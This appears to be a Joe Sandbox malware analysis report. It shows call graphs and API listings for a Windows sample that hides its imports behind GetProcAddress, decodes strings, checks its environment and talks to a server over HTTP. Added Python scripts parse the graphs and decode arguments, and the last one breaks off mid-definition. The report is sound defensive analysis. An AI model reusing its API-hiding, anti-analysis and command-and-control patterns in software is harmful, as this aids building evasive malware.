7c8cf0 38552->38746 38555 7b4f38 38553->38555 38761 7ba210 CryptStringToBinaryA 38555->38761 38556 7b49b3 38754 7cac30 38556->38754 38560 7b49c6 38561 7cabb0 lstrcpy 38560->38561 38566 7b49cf 38561->38566 38562 7cab30 2 API calls 38563 7b4f55 38562->38563 38564 7cacc0 4 API calls 38563->38564 38567 7b4f6b 38564->38567 38565 7b4f77 codecvt 38569 7caab0 lstrcpy 38565->38569 38570 7cacc0 4 API calls 38566->38570 38568 7cabb0 lstrcpy 38567->38568 38568->38565 38582 7b4fa7 38569->38582 38571 7b49f9 38570->38571 38572 7cabb0 lstrcpy 38571->38572 38573 7b4a02 38572->38573 38574 7cacc0 4 API calls 38573->38574 38575 7b4a21 38574->38575 38576 7cabb0 lstrcpy 38575->38576 38577 7b4a2a 38576->38577 38578 7cac30 3 API calls 38577->38578 38579 7b4a48 38578->38579 38580 7cabb0 lstrcpy 38579->38580 38581 7b4a51 38580->38581 38583 7cacc0 4 API calls 38581->38583 38582->37603 38584 7b4a70 38583->38584 38585 7cabb0 lstrcpy 38584->38585 38586 7b4a79 38585->38586 38587 7cacc0 4 API calls 38586->38587 38588 7b4a98 38587->38588 38589 7cabb0 lstrcpy 38588->38589 38590 7b4aa1 38589->38590 38591 7cacc0 4 API calls 38590->38591 38592 7b4acd 38591->38592 38593 7cac30 3 API calls 38592->38593 38594 7b4ad4 38593->38594 38595 7cabb0 lstrcpy 38594->38595 38596 7b4add 38595->38596 38597 7b4af3 InternetConnectA 38596->38597 38597->38553 38598 7b4b23 HttpOpenRequestA 38597->38598 38600 7b4b78 38598->38600 38601 7b4f0e InternetCloseHandle 38598->38601 38602 7cacc0 4 API calls 38600->38602 38601->38553 38603 7b4b8c 38602->38603 38604 7cabb0 lstrcpy 38603->38604 38605 7b4b95 38604->38605 38606 7cac30 3 API calls 38605->38606 38607 7b4bb3 38606->38607 38608 7cabb0 lstrcpy 38607->38608 38609 7b4bbc 38608->38609 38610 7cacc0 4 API calls 38609->38610 38611 7b4bdb 38610->38611 38612 7cabb0 lstrcpy 38611->38612 38613 7b4be4 38612->38613 38614 7cacc0 4 API calls 38613->38614 38615 7b4c05 38614->38615 38616 7cabb0 lstrcpy 38615->38616 38617 7b4c0e 38616->38617 38618 7cacc0 4 API calls 38617->38618 38619 7b4c2e 
38618->38619 38620 7cabb0 lstrcpy 38619->38620 38621 7b4c37 38620->38621 38622 7cacc0 4 API calls 38621->38622 38623 7b4c56 38622->38623 38624 7cabb0 lstrcpy 38623->38624 38625 7b4c5f 38624->38625 38626 7cac30 3 API calls 38625->38626 38627 7b4c7d 38626->38627 38628 7cabb0 lstrcpy 38627->38628 38629 7b4c86 38628->38629 38630 7cacc0 4 API calls 38629->38630 38631 7b4ca5 38630->38631 38632 7cabb0 lstrcpy 38631->38632 38633 7b4cae 38632->38633 38634 7cacc0 4 API calls 38633->38634 38635 7b4ccd 38634->38635 38636 7cabb0 lstrcpy 38635->38636 38637 7b4cd6 38636->38637 38638 7cac30 3 API calls 38637->38638 38639 7b4cf4 38638->38639 38640 7cabb0 lstrcpy 38639->38640 38641 7b4cfd 38640->38641 38642 7cacc0 4 API calls 38641->38642 38643 7b4d1c 38642->38643 38644 7cabb0 lstrcpy 38643->38644 38645 7b4d25 38644->38645 38646 7cacc0 4 API calls 38645->38646 38647 7b4d46 38646->38647 38648 7cabb0 lstrcpy 38647->38648 38649 7b4d4f 38648->38649 38650 7cacc0 4 API calls 38649->38650 38651 7b4d6f 38650->38651 38652 7cabb0 lstrcpy 38651->38652 38653 7b4d78 38652->38653 38654 7cacc0 4 API calls 38653->38654 38655 7b4d97 38654->38655 38656 7cabb0 lstrcpy 38655->38656 38657 7b4da0 38656->38657 38658 7cac30 3 API calls 38657->38658 38659 7b4dbe 38658->38659 38660 7cabb0 lstrcpy 38659->38660 38661 7b4dc7 38660->38661 38662 7caa50 lstrcpy 38661->38662 38663 7b4de2 38662->38663 38664 7cac30 3 API calls 38663->38664 38665 7b4e03 38664->38665 38666 7cac30 3 API calls 38665->38666 38667 7b4e0a 38666->38667 38668 7cabb0 lstrcpy 38667->38668 38669 7b4e16 38668->38669 38670 7b4e37 lstrlen 38669->38670 38671 7b4e4a 38670->38671 38672 7b4e53 lstrlen 38671->38672 38760 7cade0 38672->38760 38674 7b4e63 HttpSendRequestA 38675 7b4e82 InternetReadFile 38674->38675 38676 7b4eb7 InternetCloseHandle 38675->38676 38681 7b4eae 38675->38681 38679 7cab10 38676->38679 38678 7cacc0 4 API calls 38678->38681 38679->38601 38680 7cabb0 lstrcpy 38680->38681 38681->38675 38681->38676 38681->38678 38681->38680 38767 
7cade0 38682->38767 38684 7c1a14 StrCmpCA 38685 7c1a1f ExitProcess 38684->38685 38686 7c1a27 38684->38686 38687 7c1c12 38686->38687 38688 7c1afd StrCmpCA 38686->38688 38689 7c1b1f StrCmpCA 38686->38689 38690 7c1aad StrCmpCA 38686->38690 38691 7c1acf StrCmpCA 38686->38691 38692 7c1bc0 StrCmpCA 38686->38692 38693 7c1b41 StrCmpCA 38686->38693 38694 7c1ba1 StrCmpCA 38686->38694 38695 7c1b82 StrCmpCA 38686->38695 38696 7c1b63 StrCmpCA 38686->38696 38697 7cab30 lstrlen lstrcpy 38686->38697 38687->37605 38688->38686 38689->38686 38690->38686 38691->38686 38692->38686 38693->38686 38694->38686 38695->38686 38696->38686 38697->38686 38698->37611 38699->37613 38700->37619 38701->37621 38702->37627 38703->37629 38704->37633 38705->37637 38706->37641 38707->37647 38708->37649 38709->37653 38710->37667 38711->37671 38712->37670 38713->37666 38714->37670 38715->37688 38716->37673 38717->37675 38718->37679 38719->37684 38720->37685 38721->37691 38722->37698 38723->37700 38724->37723 38725->37727 38726->37728 38727->37724 38728->37728 38729->37737 38732 7caab0 lstrcpy 38731->38732 38733 7b16c3 38732->38733 38734 7caab0 lstrcpy 38733->38734 38735 7b16d5 38734->38735 38736 7caab0 lstrcpy 38735->38736 38737 7b16e7 38736->38737 38738 7caab0 lstrcpy 38737->38738 38739 7b15a3 38738->38739 38739->38464 38741 7b4816 38740->38741 38742 7b4888 lstrlen 38741->38742 38766 7cade0 38742->38766 38744 7b4898 InternetCrackUrlA 38745 7b48b7 38744->38745 38745->38541 38747 7caa50 lstrcpy 38746->38747 38748 7c8d04 38747->38748 38749 7caa50 lstrcpy 38748->38749 38750 7c8d12 GetSystemTime 38749->38750 38752 7c8d29 38750->38752 38751 7caab0 lstrcpy 38753 7c8d8c 38751->38753 38752->38751 38753->38556 38755 7cac41 38754->38755 38756 7cac98 38755->38756 38758 7cac78 lstrcpy lstrcat 38755->38758 38757 7caab0 lstrcpy 38756->38757 38759 7caca4 38757->38759 38758->38756 38759->38560 38760->38674 38762 7b4f3e 38761->38762 38763 7ba249 LocalAlloc 38761->38763 38762->38562 38762->38565 38763->38762 38764 7ba264 
CryptStringToBinaryA 38763->38764 38764->38762 38765 7ba289 LocalFree 38764->38765 38765->38762 38766->38744 38767->38684

                                        Control-flow Graph

                                        control_flow_graph 660 7c9bb0-7c9bc4 call 7c9aa0 663 7c9bca-7c9dde call 7c9ad0 GetProcAddress * 21 660->663 664 7c9de3-7c9e42 LoadLibraryA * 5 660->664 663->664 666 7c9e5d-7c9e64 664->666 667 7c9e44-7c9e58 GetProcAddress 664->667 669 7c9e96-7c9e9d 666->669 670 7c9e66-7c9e91 GetProcAddress * 2 666->670 667->666 671 7c9e9f-7c9eb3 GetProcAddress 669->671 672 7c9eb8-7c9ebf 669->672 670->669 671->672 673 7c9ed9-7c9ee0 672->673 674 7c9ec1-7c9ed4 GetProcAddress 672->674 675 7c9f11-7c9f12 673->675 676 7c9ee2-7c9f0c GetProcAddress * 2 673->676 674->673 676->675
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,01651510), ref: 007C9BF1
                                        • GetProcAddress.KERNEL32(77190000,016515A0), ref: 007C9C0A
                                        • GetProcAddress.KERNEL32(77190000,016516C0), ref: 007C9C22
                                        • GetProcAddress.KERNEL32(77190000,01651720), ref: 007C9C3A
                                        • GetProcAddress.KERNEL32(77190000,01651528), ref: 007C9C53
                                        • GetProcAddress.KERNEL32(77190000,01658B08), ref: 007C9C6B
                                        • GetProcAddress.KERNEL32(77190000,01645088), ref: 007C9C83
                                        • GetProcAddress.KERNEL32(77190000,01645328), ref: 007C9C9C
                                        • GetProcAddress.KERNEL32(77190000,01651570), ref: 007C9CB4
                                        • GetProcAddress.KERNEL32(77190000,016516D8), ref: 007C9CCC
                                        • GetProcAddress.KERNEL32(77190000,01651588), ref: 007C9CE5
                                        • GetProcAddress.KERNEL32(77190000,01651738), ref: 007C9CFD
                                        • GetProcAddress.KERNEL32(77190000,01645208), ref: 007C9D15
                                        • GetProcAddress.KERNEL32(77190000,016515B8), ref: 007C9D2E
                                        • GetProcAddress.KERNEL32(77190000,016515D0), ref: 007C9D46
                                        • GetProcAddress.KERNEL32(77190000,01645228), ref: 007C9D5E
                                        • GetProcAddress.KERNEL32(77190000,016515E8), ref: 007C9D77
                                        • GetProcAddress.KERNEL32(77190000,01651600), ref: 007C9D8F
                                        • GetProcAddress.KERNEL32(77190000,01645148), ref: 007C9DA7
                                        • GetProcAddress.KERNEL32(77190000,01651828), ref: 007C9DC0
                                        • GetProcAddress.KERNEL32(77190000,01645108), ref: 007C9DD8
                                        • LoadLibraryA.KERNEL32(01651888,?,007C6CA0), ref: 007C9DEA
                                        • LoadLibraryA.KERNEL32(016518A0,?,007C6CA0), ref: 007C9DFB
                                        • LoadLibraryA.KERNEL32(016518B8,?,007C6CA0), ref: 007C9E0D
                                        • LoadLibraryA.KERNEL32(01651840,?,007C6CA0), ref: 007C9E1F
                                        • LoadLibraryA.KERNEL32(01651858,?,007C6CA0), ref: 007C9E30
                                        • GetProcAddress.KERNEL32(76850000,016517F8), ref: 007C9E52
                                        • GetProcAddress.KERNEL32(77040000,01651870), ref: 007C9E73
                                        • GetProcAddress.KERNEL32(77040000,01651810), ref: 007C9E8B
                                        • GetProcAddress.KERNEL32(75A10000,01658CF0), ref: 007C9EAD
                                        • GetProcAddress.KERNEL32(75690000,01645268), ref: 007C9ECE
                                        • GetProcAddress.KERNEL32(776F0000,01658BE8), ref: 007C9EEF
                                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 007C9F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 007C9EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 5c224ea580f2d90540bb0453cbd52a6ea64843359be851cbe7fa2dcf0b1a842f
                                        • Instruction ID: 12742e4da2efc84508aee57ae632e2a56de9d999440e876d4a1e2c83d3ad9cd6
                                        • Opcode Fuzzy Hash: 5c224ea580f2d90540bb0453cbd52a6ea64843359be851cbe7fa2dcf0b1a842f
                                        • Instruction Fuzzy Hash: FFA10FB6518200DFD345EFE9EC8CA9A7BB9B74D701760861ABA09C7670E734D942CF60

                                        Control-flow Graph

                                        control_flow_graph 764 7b4610-7b46e5 RtlAllocateHeap 781 7b46f0-7b46f6 764->781 782 7b479f-7b47f9 VirtualProtect 781->782 783 7b46fc-7b479a 781->783 783->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B465F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007B47EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4617, 007B4622, 007B462D, 007B4638, 007B4643, 007B4667, 007B4672, 007B467D, 007B4688, 007B4693, 007B46A7, 007B46B2, 007B46BD, 007B46C8, 007B46D3, 007B46FC, 007B4707, 007B4712, 007B471D, 007B4728, 007B4763, 007B476E, 007B4779, 007B4784, 007B478F, 007B479F, 007B47AA, 007B47B5, 007B47C0, 007B47CB (30 references to the same string)
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated, one copy per reference, joined with $)
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 31e2344c4ccd75d26dee963fef120f3990c71ce92d580949893913ae8115a052
                                        • Instruction ID: 8e1889515647a32240d282d54ec40d9fa3bef40bef4e2042533bb8aaf65071b7
                                        • Opcode Fuzzy Hash: 31e2344c4ccd75d26dee963fef120f3990c71ce92d580949893913ae8115a052
                                        • Instruction Fuzzy Hash: AE4123A07C2A346FC674B7E6887DEDD77B2DFC6711F80904BE88856380CA785600D726

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 7b62d0-7b635b call 7caab0 call 7b4800 call 7caa50 InternetOpenA StrCmpCA 1040 7b635d 1033->1040 1041 7b6364-7b6368 1033->1041 1040->1041 1042 7b6559-7b6575 call 7caab0 call 7cab10 * 2 1041->1042 1043 7b636e-7b6392 InternetConnectA 1041->1043 1062 7b6578-7b657d 1042->1062 1044 7b6398-7b639c 1043->1044 1045 7b654f-7b6553 InternetCloseHandle 1043->1045 1047 7b63aa 1044->1047 1048 7b639e-7b63a8 1044->1048 1045->1042 1050 7b63b4-7b63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 7b63e8-7b63ec 1050->1052 1053 7b6545-7b6549 InternetCloseHandle 1050->1053 1055 7b63ee-7b640f InternetSetOptionA 1052->1055 1056 7b6415-7b6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 7b647c-7b649b call 7c8ad0 1056->1058 1059 7b6457-7b6477 call 7caa50 call 7cab10 * 2 1056->1059 1066 7b6519-7b6539 call 7caa50 call 7cab10 * 2 1058->1066 1067 7b649d-7b64a4 1058->1067 1059->1062 1066->1062 1069 7b6517-7b653f InternetCloseHandle 1067->1069 1070 7b64a6-7b64d0 InternetReadFile 1067->1070 1069->1053 1073 7b64db 1070->1073 1074 7b64d2-7b64d9 1070->1074 1073->1069 1074->1073 1079 7b64dd-7b6515 call 7cacc0 call 7cabb0 call 7cab10 1074->1079 1079->1070
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007B644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007B64BD
                                        • InternetCloseHandle.WININET(00000000), ref: 007B653F
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6549
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 73cce85ff81b7f5af15abcb6d07f50ec68589e627b1db6a90a763f385421f221
                                        • Instruction ID: a2f118f56a7f6230758cdb950fe404811b79abaf53bf04e36511d8fbe89ae7fc
                                        • Opcode Fuzzy Hash: 73cce85ff81b7f5af15abcb6d07f50ec68589e627b1db6a90a763f385421f221
                                        • Instruction Fuzzy Hash: B6713CB1A00218EBDB24DF90DC59FEE7779AB44704F108199F60A6B194DBB86E84CF51
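The two control-flow graphs above (functions 7b4610 and 7b62d0) are printed flat, as a single token stream per function, which is hard to read once a graph has more than a handful of blocks. The Python below is an added worked example, not Joe Sandbox or sample code: it parses that stream and answers the questions a triage analyst asks of it (which block calls a given API, the shortest path from the function entry to that call, and which edges close a loop). The two CFG strings are copied verbatim from this page; the token grammar (decimal block id, hex address or lo-hi range, `call <addr>` for an internal callee, `* N` repeating the previous callee, `a->b` edges, any other token an imported API name) is an assumption read off those lines rather than a documented format.

```python
"""Parse the flattened ``control_flow_graph`` lines of a Joe Sandbox function
listing and answer triage questions about them: which block calls which API,
the shortest path from the function entry to that call, and which edges close
a loop.  Added example, not Joe Sandbox or sample code; the token grammar is
an assumption read off the lines on this page."""
import re
from collections import deque

# Constructed input: the CFG lines of 7b4610 and 7b62d0, copied verbatim.
CFG_7B4610 = ("control_flow_graph 764 7b4610-7b46e5 RtlAllocateHeap 781 7b46f0-7b46f6 "
              "764->781 782 7b479f-7b47f9 VirtualProtect 781->782 783 7b46fc-7b479a "
              "781->783 783->781")
CFG_7B62D0 = ("control_flow_graph 1033 7b62d0-7b635b call 7caab0 call 7b4800 call 7caa50 "
              "InternetOpenA StrCmpCA 1040 7b635d 1033->1040 1041 7b6364-7b6368 1033->1041 "
              "1040->1041 1042 7b6559-7b6575 call 7caab0 call 7cab10 * 2 1041->1042 1043 "
              "7b636e-7b6392 InternetConnectA 1041->1043 1062 7b6578-7b657d 1042->1062 1044 "
              "7b6398-7b639c 1043->1044 1045 7b654f-7b6553 InternetCloseHandle 1043->1045 "
              "1047 7b63aa 1044->1047 1048 7b639e-7b63a8 1044->1048 1045->1042 1050 "
              "7b63b4-7b63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 7b63e8-7b63ec "
              "1050->1052 1053 7b6545-7b6549 InternetCloseHandle 1050->1053 1055 "
              "7b63ee-7b640f InternetSetOptionA 1052->1055 1056 7b6415-7b6455 "
              "HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 "
              "7b647c-7b649b call 7c8ad0 1056->1058 1059 7b6457-7b6477 call 7caa50 call "
              "7cab10 * 2 1056->1059 1066 7b6519-7b6539 call 7caa50 call 7cab10 * 2 "
              "1058->1066 1067 7b649d-7b64a4 1058->1067 1059->1062 1066->1062 1069 "
              "7b6517-7b653f InternetCloseHandle 1067->1069 1070 7b64a6-7b64d0 "
              "InternetReadFile 1067->1070 1069->1053 1073 7b64db 1070->1073 1074 "
              "7b64d2-7b64d9 1070->1074 1073->1069 1074->1073 1079 7b64dd-7b6515 call "
              "7cacc0 call 7cabb0 call 7cab10 1074->1079 1079->1070")

ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # '7b635d' or '7b4610-7b46e5'
EDGE = re.compile(r"^(\d+)->(\d+)$")                # '764->781'


def parse_cfg(line):
    """Return (blocks, edges): blocks maps id -> {start, end, apis, calls},
    edges is the list of (src, dst) pairs in order of appearance."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
            i += 1
        elif tok == "call":                  # internal callee: 'call 7caab0'
            cur["calls"].append(tokens[i + 1])
            i += 2
        elif tok == "*":                     # '* N': previous callee appears N times
            cur["calls"].extend([cur["calls"][-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")
            cur = {"start": int(lo, 16), "end": int(hi or lo, 16), "apis": [], "calls": []}
            blocks[tok] = cur
            i += 2
        else:                                # anything else is an imported API name
            cur["apis"].append(tok)
            i += 1
    return blocks, edges


def successors(edges):
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    return succ


def blocks_calling(blocks, api):
    """Ids of the blocks that call the named imported API."""
    return [bid for bid, blk in blocks.items() if api in blk["apis"]]


def shortest_path(edges, src, dst):
    """BFS over the edge list; the block ids from src to dst, or None."""
    succ, prev, queue = successors(edges), {src: None}, deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in succ.get(node, []):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


def back_edges(edges, entry):
    """Edges whose target is still on the DFS stack when taken; each closes a
    loop (a decryption loop or a read loop is the usual suspect)."""
    succ, state, found = successors(edges), {}, []

    def visit(node):
        state[node] = "active"
        for nxt in succ.get(node, []):
            if state.get(nxt) == "active":
                found.append((node, nxt))
            elif nxt not in state:
                visit(nxt)
        state[node] = "done"

    visit(entry)
    return found


if __name__ == "__main__":
    for name, cfg, api in (("7b4610", CFG_7B4610, "VirtualProtect"),
                           ("7b62d0", CFG_7B62D0, "InternetReadFile")):
        blocks, edges = parse_cfg(cfg)
        entry = next(iter(blocks))
        for target in blocks_calling(blocks, api):
            path = shortest_path(edges, entry, target)
            print(f"{name}: {api} in block {target} at {blocks[target]['start']:#x}, "
                  f"{len(path) - 1} edges from entry: {' -> '.join(path)}")
        print(f"{name}: loop back-edges {back_edges(edges, entry)}")
```

Run against the two graphs it reports that VirtualProtect in 7b4610 sits two edges from the entry, behind the 781/783 loop (back-edge 783->781), and that in 7b62d0 InternetReadFile is ten edges from the entry with the read loop closed by 1079->1070; the three InternetCloseHandle blocks (1045, 1053, 1069) chain into each other (1069->1053->1045->1042) and form the unwind path taken on every failure branch.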

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 7c7690-7c76da GetWindowsDirectoryA 1357 7c76dc 1356->1357 1358 7c76e3-7c7757 GetVolumeInformationA call 7c8e90 * 3 1356->1358 1357->1358 1365 7c7768-7c776f 1358->1365 1366 7c778c-7c77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 7c7771-7c778a call 7c8e90 1365->1367 1368 7c77b8-7c77e8 wsprintfA call 7caa50 1366->1368 1369 7c77a9-7c77b6 call 7caa50 1366->1369 1367->1365 1377 7c780e-7c781e 1368->1377 1369->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007C76D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C779A
                                        • wsprintfA.USER32 ref: 007C77D0
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: c15b150966fa06d8a238acfc007c431af1908e8278474e69534839390f2ef1ee
                                        • Instruction ID: fd6ef2e818beeef548966184a516b535f645f953fd2af7fdf4c0b5c6dc0438e6
                                        • Opcode Fuzzy Hash: c15b150966fa06d8a238acfc007c431af1908e8278474e69534839390f2ef1ee
                                        • Instruction Fuzzy Hash: 294173B1D04248EBDB14DB94DC85FDEBBB8AB48704F10419DF609A7280DB79AA44CFA5
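The APIs lists in this report print every argument as a raw hex word, which hides exactly the values that matter for triage: the protection passed to VirtualProtect in 7b4610, the service type, request flags and option number of the WinINet calls in 7b62d0, and the buffer sizes in 7c7690. The Python below is an added example, not Joe Sandbox code, that parses those lines as they appear on this page and names the constants. The sample input is copied from the three listings above; the constant values come from the Windows SDK headers (wininet.h, winnt.h) and the argument positions follow the documented prototypes. Joe Sandbox resolves arguments on a best-effort basis, so a `?` is left undecoded rather than guessed.

```python
"""Parse the ``APIs`` lines of a Joe Sandbox function listing and decode the
numeric arguments against the Win32/WinINet constants they stand for, so that
``HttpOpenRequestA(...,00400100,...)`` reads as KEEP_CONNECTION|PRAGMA_NOCACHE
without opening the SDK headers.  Added example, not Joe Sandbox code.  The
argument positions follow the documented prototypes; ``?`` marks an argument
the sandbox could not resolve and is left alone."""
import re

# Constructed input: API lines copied from the function listings on this page.
SAMPLE_LINES = """
• RtlAllocateHeap.NTDLL(00000000), ref: 007B465F
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007B47EC
  • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
• InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
• HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007B644D
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007B64BD
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007C76D2
• wsprintfA.USER32 ref: 007C77D0
"""

LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX = re.compile(r"[0-9A-Fa-f]+")

# Constants from the Windows SDK headers (wininet.h, winnt.h).
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
# (api, zero-based argument index) -> how that argument is decoded
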